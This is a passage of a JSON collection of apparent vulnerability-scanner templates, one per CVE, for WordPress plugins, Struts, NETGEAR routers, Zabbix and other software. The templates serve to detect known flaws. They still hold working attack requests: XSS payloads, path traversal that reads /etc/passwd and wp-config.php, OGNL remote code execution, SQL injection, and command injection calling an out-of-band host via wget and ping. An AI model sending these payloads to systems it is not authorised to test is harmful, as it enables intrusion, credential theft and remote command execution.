Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name & password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Smart Wizard Result "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/pondol-formmail/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3088","info":{"name":"Apache ActiveMQ Fileserver - Arbitrary File Write","severity":"critical"},"requests":[{"raw":["PUT /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{rand1}}\n","GET /fileserver/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1==204","status_code_2==200","contains((body_2), '{{rand1}}')"],"condition":"and"}]}]},{"id":"CVE-2016-6277","info":{"name":"NETGEAR Routers - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-8527","info":{"name":"Aruba Airwave <8.2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Page Layout Builder ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000142","info":{"name":"WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/parsi-font/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-Parsi Admin Font Editor","MW Font Changer"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/defa-online-image-protector/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Defa Online Image 